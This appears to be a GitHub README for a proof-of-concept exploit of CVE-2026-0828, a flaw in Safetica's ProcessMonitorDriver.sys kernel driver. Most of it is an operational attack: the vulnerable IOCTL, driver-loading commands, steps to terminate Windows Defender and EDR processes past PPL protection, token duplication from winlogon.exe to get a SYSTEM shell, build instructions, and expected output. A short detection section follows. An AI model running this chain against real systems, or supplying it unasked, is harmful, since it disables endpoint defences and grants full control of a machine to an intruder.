mein-0/cve-2026-0828

# CVE-2026-0828 — Safetica ProcessMonitorDriver.sys BYOVD PoC Safetica DLP kernel driver (`ProcessMonitorDriver.sys`) exposes an unauthenticated IOCTL that allows any user-mode caller to terminate arbitrary processes via `ZwTerminateProcess` in kernel context, bypassing PPL (Protected Process Light) protection. **CVSS:** 8.8 (High) · **Type:** BYOVD, LPE · **Platform:** Windows x64 ## Vulnerability The `IRP_MJ_DEVICE_CONTROL` handler for IOCTL `0xB822200C` calls `ZwOpenProcess` with `PROCESS_ALL_ACCESS (0x1FFFFF)` and subsequently `ZwTerminateProcess` using a PID supplied directly from the input buffer — **without any privilege or caller validation.** // Vulnerable handler (IDA pseudocode) ClientId.UniqueProcess = **(HANDLE **)(irp->AssociatedIrp.SystemBuffer); ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId); ZwTerminateProcess(ProcessHandle, 0); // no SeSinglePrivilegeCheck, no ExGetPreviousMode check Because the call originates in kernel context, PPL-protected processes (Windows Defender, EDR agents) can be terminated. **Affected versions:** Safetica < 11.26.19 / < 10.5.150 **Fixed in:** Safetica 11.26.19, 11.29.8, 10.5.150 — privilege check added to IOCTL handler **References:** [KOSEC Advisory](https://kosec.io/2025/11/01/safetica-byovd.html) · [CERT VU#818729](https://kb.cert.org/vuls/id/818729) ## Attack Chain Admin privileges │ ├─► Load ProcessMonitorDriver.sys │ sc create STProcessMonitor type=kernel binPath=... │ ├─► PHASE 1: Kill EDR via IOCTL 0xB822200C │ DeviceIoControl(\\.\STProcessMonitorDriver, 0xB822200C, &pid, 8, ...) │ → ZwTerminateProcess(Defender/EDR, 0) [kernel ctx, PPL bypassed] │ └─► PHASE 2: Token duplication → SYSTEM shell AdjustTokenPrivileges(SeDebugPrivilege) OpenProcess(winlogon.exe) DuplicateTokenEx(TokenPrimary) CreateProcessWithTokenW(cmd.exe) → NT AUTHORITY\SYSTEM ## Files | File | Description | |---|---| | `exploit.c` | Full PoC — kills EDR, spawns NT AUTHORITY\SYSTEM cmd.exe | ## Build Requires Visual Studio (x64 Native Tools Command Prompt): cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe ## Usage **Step 1 — Load the driver** (Admin CMD): sc create STProcessMonitor type= kernel binPath= "C:\path\to\ProcessMonitorDriver.sys" sc start STProcessMonitor **Step 2 — Run the PoC:** exploit.exe **Expected output:** [Phase 1] Killing EDR via CVE-2026-0828... MsMpEng.exe PID 3412 -> KILLED NisSrv.exe PID 4180 -> KILLED SeDebugPrivilege enabled winlogon.exe -> pid 560 [+] Got SYSTEM token handle. [+] Token duplicated. shell spawned A new `cmd.exe` window opens as `NT AUTHORITY\SYSTEM`. ## Detection **Event ID 7045** — new kernel service installation: Service Name: STProcessMonitor Service File Name: ...\ProcessMonitorDriver.sys Service Type: kernel mode driver **WDAC blocklist (SHA256):** 70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b **ETW:** Monitor `DeviceIoControl` calls to `\\.\STProcessMonitorDriver`. ## Tested On - Windows 10 22H2 x64

标签：客户端加密